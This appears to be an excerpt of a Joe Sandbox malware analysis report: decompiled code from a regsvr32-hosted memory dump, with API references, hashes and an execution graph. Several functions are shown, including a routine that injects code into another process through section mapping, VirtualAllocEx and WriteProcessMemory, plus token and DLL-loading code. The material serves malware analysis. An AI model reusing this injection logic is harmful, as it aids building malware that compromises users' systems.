                                                                                                                                                                                              							_t119 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                              							_t234 =  *_t119;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						__eflags =  *(_t272 + 0x16c0) - _t234;
                                                                                                                                                                                              						if( *(_t272 + 0x16c0) < _t234) {
                                                                                                                                                                                              							 *(_t272 + 0x16c0) = _t234;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t122 = _t272 + 0x16bc; // 0xfed1e900
                                                                                                                                                                                              						_t123 = _t272 + 0xc; // 0x452bf84d
                                                                                                                                                                                              						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                                                                                                                                                                                              						__eflags = _t257 - 0xffff;
                                                                                                                                                                                              						_t258 =  >  ? 0xffff : _t257;
                                                                                                                                                                                              						_t124 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                              						_t151 =  *_t124;
                                                                                                                                                                                              						_t125 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                                              						_t235 = _t234 -  *_t125;
                                                                                                                                                                                              						__eflags = _t258 - _t151;
                                                                                                                                                                                              						_t152 =  <=  ? _t258 : _t151;
                                                                                                                                                                                              						__eflags = _t235 - ( <=  ? _t258 : _t151);
                                                                                                                                                                                              						if(_t235 >= ( <=  ? _t258 : _t151)) {
                                                                                                                                                                                              							L49:
                                                                                                                                                                                              							__eflags = _t235 - _t258;
                                                                                                                                                                                              							_t154 =  >  ? _t258 : _t235;
                                                                                                                                                                                              							_a4 =  >  ? _t258 : _t235;
                                                                                                                                                                                              							__eflags = _t222 - 4;
                                                                                                                                                                                              							if(_t222 != 4) {
                                                                                                                                                                                              								L53:
                                                                                                                                                                                              								_t269 = 0;
                                                                                                                                                                                              								__eflags = 0;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_t161 =  *_t272;
                                                                                                                                                                                              								__eflags =  *(_t161 + 4);
                                                                                                                                                                                              								_t154 = _a4;
                                                                                                                                                                                              								if( *(_t161 + 4) != 0) {
                                                                                                                                                                                              									goto L53;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									__eflags = _t154 - _t235;
                                                                                                                                                                                              									if(_t154 != _t235) {
                                                                                                                                                                                              										goto L53;
                                                                                                                                                                                              									} else {
                                                                                                                                                                                              										_t269 = _t222 - 3;
                                                                                                                                                                                              									}
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t131 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                              							_t132 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                                              							E042B7120(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                                                                                                                                                                                              							_t134 = _t272 + 0x5c;
                                                                                                                                                                                              							 *_t134 =  *(_t272 + 0x5c) + _a4;
                                                                                                                                                                                              							__eflags =  *_t134;
                                                                                                                                                                                              							E042B5E80( *_t134,  *_t272);
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							__eflags = _t235;
                                                                                                                                                                                              							if(_t235 != 0) {
                                                                                                                                                                                              								L46:
                                                                                                                                                                                              								__eflags = _t222;
                                                                                                                                                                                              								if(_t222 != 0) {
                                                                                                                                                                                              									_t162 =  *_t272;
                                                                                                                                                                                              									__eflags =  *(_t162 + 4);
                                                                                                                                                                                              									if( *(_t162 + 4) == 0) {
                                                                                                                                                                                              										__eflags = _t235 - _t258;
                                                                                                                                                                                              										if(_t235 <= _t258) {
                                                                                                                                                                                              											goto L49;
                                                                                                                                                                                              										}
                                                                                                                                                                                              									}
                                                                                                                                                                                              								}
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								__eflags = _t222 - 4;
                                                                                                                                                                                              								if(_t222 == 4) {
                                                                                                                                                                                              									goto L46;
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						asm("sbb edi, edi");
                                                                                                                                                                                              						_t271 =  ~_t269 & 0x00000002;
                                                                                                                                                                                              						__eflags = _t271;
                                                                                                                                                                                              						return _t271;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						__eflags = _t218 - 4;
                                                                                                                                                                                              						if(_t218 == 4) {
                                                                                                                                                                                              							goto L34;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t173 =  *_t272;
                                                                                                                                                                                              							__eflags =  *(_t173 + 4);
                                                                                                                                                                                              							if( *(_t173 + 4) != 0) {
                                                                                                                                                                                              								goto L34;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_t88 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                                              								__eflags = _t254 -  *_t88;
                                                                                                                                                                                              								if(_t254 !=  *_t88) {
                                                                                                                                                                                              									goto L34;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									return 1;
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					return 3;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}






















































                                                                                                                                                                                              0x042b42c9
                                                                                                                                                                                              0x042b42c9
                                                                                                                                                                                              0x042b42ca
                                                                                                                                                                                              0x042b42ca
                                                                                                                                                                                              0x042b42c7
                                                                                                                                                                                              0x042b42d8
                                                                                                                                                                                              0x042b42db
                                                                                                                                                                                              0x042b42df
                                                                                                                                                                                              0x042b42e4
                                                                                                                                                                                              0x042b42e7
                                                                                                                                                                                              0x042b42ea
                                                                                                                                                                                              0x042b42ea
                                                                                                                                                                                              0x042b42ea
                                                                                                                                                                                              0x042b42ed
                                                                                                                                                                                              0x042b42ed
                                                                                                                                                                                              0x042b42f0
                                                                                                                                                                                              0x042b42f0
                                                                                                                                                                                              0x042b4271
                                                                                                                                                                                              0x042b4271
                                                                                                                                                                                              0x042b4281
                                                                                                                                                                                              0x042b4284
                                                                                                                                                                                              0x042b4289
                                                                                                                                                                                              0x042b4289
                                                                                                                                                                                              0x042b428c
                                                                                                                                                                                              0x042b428f
                                                                                                                                                                                              0x042b4292
                                                                                                                                                                                              0x042b4294
                                                                                                                                                                                              0x042b4294
                                                                                                                                                                                              0x042b42f3
                                                                                                                                                                                              0x042b42f5
                                                                                                                                                                                              0x042b42f8
                                                                                                                                                                                              0x042b42f8
                                                                                                                                                                                              0x042b42fe
                                                                                                                                                                                              0x042b4302
                                                                                                                                                                                              0x042b4305
                                                                                                                                                                                              0x042b4307
                                                                                                                                                                                              0x042b4307
                                                                                                                                                                                              0x042b4318
                                                                                                                                                                                              0x042b431a
                                                                                                                                                                                              0x042b431a
                                                                                                                                                                                              0x042b4322
                                                                                                                                                                                              0x042b4330
                                                                                                                                                                                              0x042b4333
                                                                                                                                                                                              0x042b4335
                                                                                                                                                                                              0x042b4355
                                                                                                                                                                                              0x042b4355
                                                                                                                                                                                              0x042b4358
                                                                                                                                                                                              0x042b435e
                                                                                                                                                                                              0x042b435f
                                                                                                                                                                                              0x042b4362
                                                                                                                                                                                              0x042b4364
                                                                                                                                                                                              0x042b4367
                                                                                                                                                                                              0x042b436a
                                                                                                                                                                                              0x042b436d
                                                                                                                                                                                              0x042b4371
                                                                                                                                                                                              0x042b4374
                                                                                                                                                                                              0x042b4377
                                                                                                                                                                                              0x042b437a
                                                                                                                                                                                              0x042b437c
                                                                                                                                                                                              0x042b437c
                                                                                                                                                                                              0x042b437f
                                                                                                                                                                                              0x042b4381
                                                                                                                                                                                              0x042b4381
                                                                                                                                                                                              0x042b4384
                                                                                                                                                                                              0x042b4386
                                                                                                                                                                                              0x042b4389
                                                                                                                                                                                              0x042b4391
                                                                                                                                                                                              0x042b4394
                                                                                                                                                                                              0x042b4399
                                                                                                                                                                                              0x042b4399
                                                                                                                                                                                              0x042b439f
                                                                                                                                                                                              0x042b43a2
                                                                                                                                                                                              0x042b43a5
                                                                                                                                                                                              0x042b43a7
                                                                                                                                                                                              0x042b43a7
                                                                                                                                                                                              0x042b43a8
                                                                                                                                                                                              0x042b43a8
                                                                                                                                                                                              0x042b43b3
                                                                                                                                                                                              0x042b43b3
                                                                                                                                                                                              0x042b43b3
                                                                                                                                                                                              0x042b43b6
                                                                                                                                                                                              0x042b43b9
                                                                                                                                                                                              0x042b43b9
                                                                                                                                                                                              0x042b43bc
                                                                                                                                                                                              0x042b43bc
                                                                                                                                                                                              0x042b437f
                                                                                                                                                                                              0x042b43bf
                                                                                                                                                                                              0x042b43c2
                                                                                                                                                                                              0x042b43c5
                                                                                                                                                                                              0x042b43c7
                                                                                                                                                                                              0x042b43ca
                                                                                                                                                                                              0x042b43cc
                                                                                                                                                                                              0x042b43cf
                                                                                                                                                                                              0x042b43d2
                                                                                                                                                                                              0x042b43d4
                                                                                                                                                                                              0x042b43d7
                                                                                                                                                                                              0x042b43df
                                                                                                                                                                                              0x042b43e7
                                                                                                                                                                                              0x042b43ea
                                                                                                                                                                                              0x042b43ea
                                                                                                                                                                                              0x042b43ea
                                                                                                                                                                                              0x042b43ed
                                                                                                                                                                                              0x042b43ed
                                                                                                                                                                                              0x042b43ed
                                                                                                                                                                                              0x042b43f0
                                                                                                                                                                                              0x042b43f6
                                                                                                                                                                                              0x042b43f8
                                                                                                                                                                                              0x042b43f8
                                                                                                                                                                                              0x042b43fe
                                                                                                                                                                                              0x042b4404
                                                                                                                                                                                              0x042b440d
                                                                                                                                                                                              0x042b4414
                                                                                                                                                                                              0x042b4416
                                                                                                                                                                                              0x042b4419
                                                                                                                                                                                              0x042b4419
                                                                                                                                                                                              0x042b441c
                                                                                                                                                                                              0x042b441c
                                                                                                                                                                                              0x042b441f
                                                                                                                                                                                              0x042b4421
                                                                                                                                                                                              0x042b4424
                                                                                                                                                                                              0x042b4426
                                                                                                                                                                                              0x042b4441
                                                                                                                                                                                              0x042b4441
                                                                                                                                                                                              0x042b4445
                                                                                                                                                                                              0x042b4448
                                                                                                                                                                                              0x042b444b
                                                                                                                                                                                              0x042b444e
                                                                                                                                                                                              0x042b4464
                                                                                                                                                                                              0x042b4464
                                                                                                                                                                                              0x042b4464
                                                                                                                                                                                              0x042b4450
                                                                                                                                                                                              0x042b4450
                                                                                                                                                                                              0x042b4452
                                                                                                                                                                                              0x042b4456
                                                                                                                                                                                              0x042b4459
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b445b
                                                                                                                                                                                              0x042b445b
                                                                                                                                                                                              0x042b445d
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3510742995-0
                                                                                                                                                                                              • Opcode ID: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                                              • Instruction ID: cd962acf355207a22219db905af242a8b1b18c431bf59497f58294119a8a6e77
                                                                                                                                                                                              • Opcode Fuzzy Hash: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 26D10471B107019FDB24DF69D8C09AAB7E5EF88384B24892DE8DAC7702D731F9458B94
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E042AC79E(void* __ecx) {
                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                              				intOrPtr _t13;
                                                                                                                                                                                              
                                                                                                                                                                                              				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
                                                                                                                                                                                              					L4:
                                                                                                                                                                                              					_t10 = _v8;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					if(GetLastError() != 0x3f0) {
                                                                                                                                                                                              						L3:
                                                                                                                                                                                              						_t10 = 0;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t13 =  *0x42bf818; // 0x48ef8b0
                                                                                                                                                                                              						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x12c))(), 8,  &_v8) != 0) {
                                                                                                                                                                                              							goto L4;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t10;
                                                                                                                                                                                              			}







                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 042AC7B1
                                                                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,042AC8E3,00000000,042A0000), ref: 042AC7B8
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,042AC8E3,00000000,042A0000), ref: 042AC7BF
                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,042AC8E3,00000000,042A0000), ref: 042AC7E4
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: OpenThreadToken$CurrentErrorLastProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1515895013-0
                                                                                                                                                                                              • Opcode ID: 1f63c830d766009932634072d065d3308fc291f2ca2fc19f98cfae4982fd6994
                                                                                                                                                                                              • Instruction ID: 02cff625a390add360aa6cd1617a2d14b556b849438fddcc3b16ddf0a9c38b35
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f63c830d766009932634072d065d3308fc291f2ca2fc19f98cfae4982fd6994
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3EF03AB2714606ABDB009FA9ED4DB9A37ECFB09340F0044A0EA82D7040E764FE408BE0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 89%
                                                                                                                                                                                              			E042AD218(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				char _v140;
                                                                                                                                                                                              				signed char _t14;
                                                                                                                                                                                              				char _t15;
                                                                                                                                                                                              				intOrPtr _t20;
                                                                                                                                                                                              				void* _t25;
                                                                                                                                                                                              				intOrPtr _t26;
                                                                                                                                                                                              				intOrPtr _t32;
                                                                                                                                                                                              				WCHAR* _t34;
                                                                                                                                                                                              				intOrPtr _t35;
                                                                                                                                                                                              				struct HINSTANCE__* _t37;
                                                                                                                                                                                              				intOrPtr _t38;
                                                                                                                                                                                              				intOrPtr _t46;
                                                                                                                                                                                              				void* _t47;
                                                                                                                                                                                              				intOrPtr _t50;
                                                                                                                                                                                              				void* _t60;
                                                                                                                                                                                              				void* _t61;
                                                                                                                                                                                              				char _t62;
                                                                                                                                                                                              				void* _t65;
                                                                                                                                                                                              				intOrPtr _t66;
                                                                                                                                                                                              				char _t68;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t65 = __esi;
                                                                                                                                                                                              				_t61 = __edi;
                                                                                                                                                                                              				_t47 = __ebx;
                                                                                                                                                                                              				_t50 =  *0x42bf81c; // 0x48efbe8
                                                                                                                                                                                              				_t1 = _t50 + 0x1898; // 0x0
                                                                                                                                                                                              				_t14 =  *_t1;
                                                                                                                                                                                              				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
                                                                                                                                                                                              					_t15 = E042A9DF2(_t50, 0x392);
                                                                                                                                                                                              					_t66 =  *0x42bf81c; // 0x48efbe8
                                                                                                                                                                                              					_t62 = _t15;
                                                                                                                                                                                              					_t67 = _t66 + 0xb0;
                                                                                                                                                                                              					_v8 = _t62;
                                                                                                                                                                                              					E042A9E51( &_v140, 0x40, L"%08x", E042AE2C5(_t66 + 0xb0, E042AA43D(_t66 + 0xb0), 0));
                                                                                                                                                                                              					_t20 =  *0x42bf81c; // 0x48efbe8
                                                                                                                                                                                              					_t7 = _t20 + 0xa8; // 0x1
                                                                                                                                                                                              					asm("sbb eax, eax");
                                                                                                                                                                                              					_t25 = E042A9DF2(_t67, ( ~( *_t7) & 0x00000a0b) + 0xf8);
                                                                                                                                                                                              					_t26 =  *0x42bf81c; // 0x48efbe8
                                                                                                                                                                                              					_t68 = E042A9A5A(_t26 + 0x1020);
                                                                                                                                                                                              					_v12 = _t68;
                                                                                                                                                                                              					E042A8BAF( &_v8);
                                                                                                                                                                                              					_t32 =  *0x42bf81c; // 0x48efbe8
                                                                                                                                                                                              					_t34 = E042A9A5A(_t32 + 0x122a);
                                                                                                                                                                                              					 *0x42bf91c = _t34;
                                                                                                                                                                                              					_t35 =  *0x42bf818; // 0x48ef8b0
                                                                                                                                                                                              					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x42bc9a0,  &_v140, ".", L"dll", 0, 0x42bc9a0, _t25, 0x42bc9a0, _t62, 0, _t61, _t65, _t47);
                                                                                                                                                                                              					_t37 = LoadLibraryW( *0x42bf91c);
                                                                                                                                                                                              					 *0x42bf914 = _t37;
                                                                                                                                                                                              					if(_t37 == 0) {
                                                                                                                                                                                              						_t38 = 0;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_push(_t37);
                                                                                                                                                                                              						_t60 = 0x28;
                                                                                                                                                                                              						_t38 = E042AF011(0x42bcb8c, _t60);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					 *0x42bf918 = _t38;
                                                                                                                                                                                              					E042A8BF4( &_v12, 0xfffffffe);
                                                                                                                                                                                              					E042A8D6D( &_v140, 0, 0x80);
                                                                                                                                                                                              					if( *0x42bf918 != 0) {
                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						E042A8BF4(0x42bf91c, 0xfffffffe);
                                                                                                                                                                                              						goto L8;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					L8:
                                                                                                                                                                                              					if( *0x42bf918 == 0) {
                                                                                                                                                                                              						_t46 =  *0x42bf850; // 0x48ef9f0
                                                                                                                                                                                              						 *0x42bf918 = _t46;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L10:
                                                                                                                                                                                              					return 1;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}


























                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                              • String ID: %08x$dll
                                                                                                                                                                                              • API String ID: 1029625771-2963171978
                                                                                                                                                                                              • Opcode ID: 5dcfcb9b25f3b8be8e9c058be7c9b4cb9de146c409950c7145f18ccd1622f825
                                                                                                                                                                                              • Instruction ID: b4c4b8468ea3ed32cfe720f6fff318fc0040cb74031b632029a37306cfb76e31
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5dcfcb9b25f3b8be8e9c058be7c9b4cb9de146c409950c7145f18ccd1622f825
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D31B1B1760604BFE710AA69FD48FDA73ADEB45318F118176F844D3180DA38AE958BE4
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E042B3674(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                                                                                                                                                                              				char _v5;
                                                                                                                                                                                              				long long _v12;
                                                                                                                                                                                              				short _v20;
                                                                                                                                                                                              				signed int _t15;
                                                                                                                                                                                              				void* _t16;
                                                                                                                                                                                              				signed int _t22;
                                                                                                                                                                                              				char _t25;
                                                                                                                                                                                              				void* _t26;
                                                                                                                                                                                              				signed int _t28;
                                                                                                                                                                                              				intOrPtr _t29;
                                                                                                                                                                                              				void* _t31;
                                                                                                                                                                                              				char** _t32;
                                                                                                                                                                                              				long long _t40;
                                                                                                                                                                                              				long long _t41;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t40 = __fp0;
                                                                                                                                                                                              				_t15 = E042B358D(_a4);
                                                                                                                                                                                              				 *_t32 = "msxml3.dll";
                                                                                                                                                                                              				_t28 = _t15 & 0x0fffffff;
                                                                                                                                                                                              				_t16 = E042AA43D();
                                                                                                                                                                                              				_t26 = 0xf;
                                                                                                                                                                                              				_t25 = 0;
                                                                                                                                                                                              				_v5 = 0;
                                                                                                                                                                                              				if(_t16 > _t26) {
                                                                                                                                                                                              					L2:
                                                                                                                                                                                              					_t3 = _t25 + 0x41; // 0x41
                                                                                                                                                                                              					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
                                                                                                                                                                                              					_t25 = _t25 + 1;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t26 = _t16;
                                                                                                                                                                                              					if(_t26 != 0) {
                                                                                                                                                                                              						do {
                                                                                                                                                                                              							goto L2;
                                                                                                                                                                                              						} while (_t25 < _t26);
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				lstrlenW( &_v20);
                                                                                                                                                                                              				_t29 = _a8;
                                                                                                                                                                                              				_t22 = _a12 - _t29 + 1;
                                                                                                                                                                                              				_a12 = _t22;
                                                                                                                                                                                              				asm("fild dword [ebp+0x10]");
                                                                                                                                                                                              				if(_t22 < 0) {
                                                                                                                                                                                              					_t40 = _t40 +  *0x42bcf58;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_a12 = _t28;
                                                                                                                                                                                              				_v12 = _t40;
                                                                                                                                                                                              				_t41 = _v12;
                                                                                                                                                                                              				asm("fild dword [ebp+0x10]");
                                                                                                                                                                                              				if(_t28 < 0) {
                                                                                                                                                                                              					_t41 = _t41 +  *0x42bcf58;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_v12 = _t41;
                                                                                                                                                                                              				asm("fmulp st1, st0");
                                                                                                                                                                                              				L042B8935();
                                                                                                                                                                                              				return _t29 - _t22;
                                                                                                                                                                                              			}


















                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 042B36BB
                                                                                                                                                                                              • _ftol2_sse.MSVCRT ref: 042B36FE
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _ftol2_sselstrlen
                                                                                                                                                                                              • String ID: msxml3.dll
                                                                                                                                                                                              • API String ID: 1292649733-2158035192
                                                                                                                                                                                              • Opcode ID: 795e77292025ea3543bd40011fe22ea7e461dec0997eb090028cd2f45a7c09ad
                                                                                                                                                                                              • Instruction ID: 11584ee3f26995382319c72662684cb2f229706bf63a8ae8fe06fa390651994f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 795e77292025ea3543bd40011fe22ea7e461dec0997eb090028cd2f45a7c09ad
                                                                                                                                                                                              • Instruction Fuzzy Hash: 43110232B106899BCF00DF69E8080DE7BB5FF94390B2285A9DC9592241EB30E5A487C5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                              Execution Coverage:4.3%
                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                              Total number of Nodes:417
                                                                                                                                                                                              Total number of Limit Nodes:6
22634 4afd587 NtMapViewOfSection 22627->22634 22629 4afd6c3 22628->22629 22635 4afd6bf NtUnmapViewOfSection 22628->22635 22632 4afd6cc NtClose 22629->22632 22633 4afd6d7 22629->22633 22630->22627 22632->22633 22633->22570 22633->22575 22634->22628 22636 4afd5ab 22634->22636 22635->22629 22637 4af8c43 RtlAllocateHeap 22636->22637 22638 4afd5bb 22637->22638 22638->22628 22639 4afd5ca VirtualAllocEx WriteProcessMemory 22638->22639 22640 4af8bf4 2 API calls 22639->22640 22641 4afd611 22640->22641 22642 4afd674 lstrlenW 22641->22642 22642->22628 22644 4afd394 FreeLibrary 22643->22644 22645 4afd3a2 22643->22645 22644->22645 22646 4afd3c3 22645->22646 22647 4af8bf4 2 API calls 22645->22647 22646->22386 22647->22646 22648->22607 22649->22611 22709 4af296e 15 API calls 22716 4af26ec 12 API calls 22717 4af2aeb 9 API calls 22735 4af5bea 12 API calls 22725 4af1e66 7 API calls 22746 4af1f65 8 API calls 22689 4af34e1 10 API calls 22747 4af377f 18 API calls 22719 4abfaf0 VirtualAlloc 22720 4af1ef0 6 API calls 22748 4af334e 14 API calls 22705 4af61c5 97 API calls 22727 4af2a44 37 API calls 22749 4af3b5d 25 API calls 22710 4af5959 GetLastError 22697 4af2855 GetLastError RtlAllocateHeap HeapFree memset

Control-flow Graph

C-Code - Quality: 95%
E04AFD447(void* __ecx, intOrPtr __edx) {
	void* _v8;
	void* _v12;
	void* _v16;
	void* _v20;
	long _v24;
	long _v28;
	short _v32;
	char _v36;
	intOrPtr* _v40;
	intOrPtr _v44;
	long _v48;
	void* _v52;
	void* _v53;
	char _v64;
	short _v68;
	struct _WNDCLASSEXA _v116;
	char _t81;
	intOrPtr* _t83;
	intOrPtr _t87;
	intOrPtr _t90;
	char _t97;
	short _t98;
	intOrPtr _t105;
	long _t107;
	char _t119;
	void* _t124;
	struct HWND__* _t132;
	void* _t138;
	void* _t147;
	void* _t154;
	intOrPtr _t155;
	intOrPtr _t157;
	void* _t158;
	void* _t163;
	void* _t165;

	_t81 =  *0x4b0f81c; // 0x4c2fbe8
	_t138 = 0;
	_v12 = __ecx;
	_t157 = __edx;
	_v20 = 0;
	_v52 = 0;
	_v48 = 0;
	_v16 = 0;
	_v8 = 0;
	_v24 = 0;
	_v44 = __edx;
	if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
		E04AFF0DE(0x1f4);
	}
	_t12 = _t157 + 0x3c; // 0x852c50ff
	_t83 =  *_t12 + _t157;
	_v28 = _t138;
	_v40 = _t83;
	if( *_t83 != 0x4550) {
		L14:
		_t158 = _v12;
		L15:
		if(_v8 != _t138) {
			_t90 =  *0x4b0f918; // 0x4c2f9f0
			 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
			_v8 = _t138;
		}
		L17:
		if(_v16 != 0) {
			_t87 =  *0x4b0f818; // 0x4c2f8b0
			NtUnmapViewOfSection( *((intOrPtr*)(_t87 + 0x12c))(), _v16);
		}
		if(_v20 != 0) {
			NtClose(_v20);
		}
		return _v8;
	}
	_v52 =  *((intOrPtr*)(_t83 + 0x50));
	if(NtCreateSection( &_v20, 0xe, _t138,  &_v52, 0x40, 0x8000000, _t138) < 0) {
		goto L14;
	}
	_t97 =  *"18293"; // 0x39323831
	_v36 = _t97;
	_t98 =  *0x4b0ce44; // 0x33
	_v32 = _t98;
	_v116.lpszClassName =  &_v64;
	asm("movsd");
	_v116.lpfnWndProc = DefWindowProcW;
	_v116.cbWndExtra = _t138;
	asm("movsd");
	_v116.style = 0xb;
	_v116.lpszMenuName = _t138;
	_v116.cbSize = 0x30;
	asm("movsb");
	_v116.cbClsExtra = _t138;
	_v116.hInstance = _t138;
	if(RegisterClassExA( &_v116) != 0) {
		_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
		if(_t132 != 0) {
			DestroyWindow(_t132);
			UnregisterClassA( &_v64, _t138);
		}
	}
	_t105 =  *0x4b0f818; // 0x4c2f8b0
	_t107 = NtMapViewOfSection(_v20,  *((intOrPtr*)(_t105 + 0x12c))(),  &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40);
	_t158 = _v12;
	if(_t107 < 0 || NtMapViewOfSection(_v20, _t158,  &_v8, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40) < 0) {
		goto L15;
	} else {
		_t154 = E04AF8C43( *0x4b0f81c, 0x1ac4);
		_v36 = _t154;
		if(_t154 == 0) {
			goto L15;
		}
		 *((intOrPtr*)(_t154 + 0x224)) = _v8;
		_t163 = VirtualAllocEx(_t158, _t138, 0x1ac4, 0x1000, 4);
		WriteProcessMemory(_v12, _t163, _t154, 0x1ac4,  &_v28);
		E04AF8BF4( &_v36, 0x1ac4);
		_t119 =  *0x4b0f81c; // 0x4c2fbe8
		_t155 =  *0x4b0f830; // 0x4af0000
		_v36 = _t119;
		 *0x4b0f830 = _v8;
		 *0x4b0f81c = _t163;
